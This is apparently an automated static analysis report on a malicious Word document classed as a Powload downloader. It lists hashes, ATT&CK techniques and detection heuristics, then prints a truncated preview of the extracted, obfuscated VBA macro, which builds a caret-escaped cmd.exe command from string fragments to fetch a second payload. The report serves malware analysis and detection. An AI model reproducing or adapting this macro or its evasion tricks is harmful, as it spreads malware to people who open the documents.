Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84319a12c90cdfff…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 86.9 KB
Created: 2018-08-27 06:56:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 7e92b4f9e36142bdf175c126630e748d
SHA-1: f238ebe33bb28691bc22ebbaaf03b3ab694ef367
SHA-256: 84319a12c90cdfff298a362a0cc1d187a4293e3c608f3cec791ee467aafb54f2
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro makes a Shell() call, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The reconstructed command 'MD /c R^S^t ^ ^ ^B^W^k^q==' indicates an attempt to execute a command line, most likely to download and run a secondary payload; the carets are cmd.exe escape characters that the interpreter strips before execution, a common way of breaking up keywords to evade string-based detection. In the extracted source the command is assembled from many short concatenated string fragments and a Chr() call whose argument is computed arithmetically, padded with filler Error statements that are neutralised by On Error Resume Next. The ClamAV detection 'Doc.Downloader.Powload-6665573-0' further supports this downloader classification.

Heuristics (7)

  • [critical] ClamAV: Doc.Downloader.Powload-6665573-0 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Powload-6665573-0
  • [medium] VBA macros detected (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • [critical] Shell() call in VBA (OLE_VBA_SHELL)
    Shell() call in VBA
  • [high] AutoOpen macro (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • [high] VBA p-code auto-exec with execution tokens (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • [medium] Legacy WordBasic auto-exec macro marker (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10719 bytes
SHA-256: 8814aab09dc59ba772cf4572120bafdea47ea260fc98eec723e14b9c0f618f81

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vFaGzvnzUEhwmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BvhZomkHo"
Function vKUBCCc()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error EzGWm / dJpID * 32994 / Qavrlu
   Error 43843 / pjbjA / DidBtt * kGGqm
   Error wYFjSl * 39632
zqczaXLFk = "MD" + " " + "/" + "v^ /" + "R" + Chr(2 + 3 + 3 + 5 + 21) + " ^S^E" + "^t  " + "^ ^ ^B^" + "W^k^q=="
Error 73855 / zjIYA * TPJRSk / kFhaS
   Error 13428 * HsCNV * MuhiFl / juabb
Nmmluf = "^A^A" + "I^A^AC" + "Ag^AAIA" + "AC^" + "A^gAA" + "^I^A^A" + "C^A" + "^g^" + "AA^I^" + "A^" + "A" + "CA^g^A" + "^"
Error 26634 * bbaVVB
   Error 99457 * KlVjb * 11094 * 33492
   Error 74629 / ztAKH * 97699 / awDPRb
   Error 13695 * 39492
   Error udfDp / GLfPHV
wzNIEQhQtOl = "A^" + "I" + "AA" + "C^" + "Ag^AA^"
Error CsQoNb * 54479 * 41036 * BNECiz
   Error 29350 / 60381 * Zooct / MIcfB
   Error LXjSj * fYXRT / psQlEI / lchAO
   Error 44928 / 24868 * KnSzq * rpCnrk
   Error fYfLz * GCltcG * 5939 / iuduLw
hOKcNsDuVn = "IA" + "AC" + "A9" + "^" + "BQf^A^s" + "^H^A^o" + "Bw^" + "Y" + "^A^"
Error dTbVz / drrXfI
   Error HLOPK * bWSpjh / moChhl / 15703
QQhMNBl = "QH" + "Ah^B^wY" + "^" + "A0HA^" + "7^Aw" + "^a" + "AEGAlB" + "gcA^IGA" + "^7^A^QV" + "AY" + "^E^A^qB" + "^A^J" + "A^AC^At"
Error 44465 / Nojwa
   Error MCWJfv / fLzjrM
   Error 85393 / BmoSj * CpqwXB / 46134
   Error 19396 * 40526 * 65405 / uccVT
oVHipq = "B^Q^ZA" + "^Q" + "^HA^J" + "^BQL" + "AU^GAr"
Error EPufk * vFptl / 68356 / zjrUo
   Error uDzGRT / JITNSr / YIsRj / iVdjc
   Error 37549 / XMLJHd / 35775 * ApPijT
fuEXkCrjuC = "B^w^bAY" + "^" + "HA^u^BQ" + "S" + "A^sDApA" + "QVA" + "Y" + "^EA" + "^qB^A" + "^JAACA" + "^sA"
Error WEbiu * ZkRMf * aCAoP / 99312
zBQzLB = "^A^a^A^" + "8" + "E" + "^A3^B" + "^A^" + "J" + "A^gC" + "AlBA" + "bAk^G" + "^AGB"
Error 33369 * mSmiv / aPiLi / 65417
   Error rjYdz / rflccj / pUczL * PSJrMS
rqzVGGONDjQ = "AZA^" + "EG" + "Av" + "B" + "AbA4G^A" + "^3" + "^B^" + "w^b" + "^AQ"
Error 2863 / TZsOww / bdjdOG / KFPDlv
LtwKVVr = "EA^uA^g" + "^W^A" + "^Y^E" + "^" + "Ay^" + "B"
Error 36517 / YlirLL / 92926 * qzRDkS
   Error LOoPSk / 97854
   Error 63587 / DzYGj * 10901 / 11846
   Error 85150 * BUfJAL
dYGNpijwQi = "A^JA" + "sH" + "A^5^Bgc" + "AQHA7B" + "QKAY" + "^E" + "^A^tB" + "^" + "gUA^Q" + "C" + "^A" + "^gAgb^" + "Ak^G^A^"
Error 30221 / VzftH
PvlSjwuJ = "g^AA" + "^aA8^E" + "^A^3BA" + "^" + "JA^gCA"
vKUBCCc = zqczaXLFk + Nmmluf + wzNIEQhQtOl + hOKcNsDuVn + QQhMNBl + oVHipq + fuEXkCrjuC + zBQzLB + rqzVGGONDjQ + LtwKVVr + dYGNpijwQi + PvlSjwuJ
   Error cMdzlB * KcBLZk
   Error lXZGKF * zGkQM
End Function
Function VjEGP()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 91953 / ukUBh
   Error osDKjU * PIOss
   Error 21628 / lHiKK
   Error 17520 / PBlwP
   Error kAibKa / UaqKR
tfLri = "^o" + "B^w" + "YAEG^A" + "lB^gc^" + "A8G^A^m"
Error 4568 / 55545
   Error TPiMv / hEroM * bkhHB * AFktbG
   Error ajWNN / qJDQCI * fHKst * oBiJHO
YASttRzV = "Bw^O^Ac" + "C" + "Al^BAe" + "^AUG^Au" + "^A^"
Error aPVfk / DTaIV
   Error 50572 * 27535 * 98259 / YWtUEG
DKzQidCZI = "wJA^sC^" + "A^3^B^w" + "Q^A^" + "k" + "G^A^k" + "^A^w" + "^K^AcCA" + "c^B^wJ^" + "AsC^" + "AjBQ^a"
Error mzfLjJ * 57753
   Error 71138 * ocrtq / 30147 / RaNiC
vPdJiLXMlRI = "Aw" + "^G^" + "Ai^BQd^" + "A^" + "A^HA6" + "^" + "Ag^d^A" + "^4^G" + "Al^B" + "^AJA0D^" + "AV^B^"
Error CwbvjB * DRRvz
   Error pPQjvj * NcufJ / 18710 * jjSdGB
   Error pZzRSs * tnzErN / wGOwv / CJpfn
   Error LBVqGJ * oSwOoM / ZvsbYo / jPZrX
GcPHkicSwu = "g" + "R^A" + "^o^GA" + "^kA^w^" + "O" + "^A" + "cC^Aw" + "^AA" + "^OA^Y^D"
Error 28254 / 8133
   Error focjv * VmJXk / 60209 * uZimvz
   Error 99080 / sftuD
   Error zoAGiv * qKjow
... (truncated)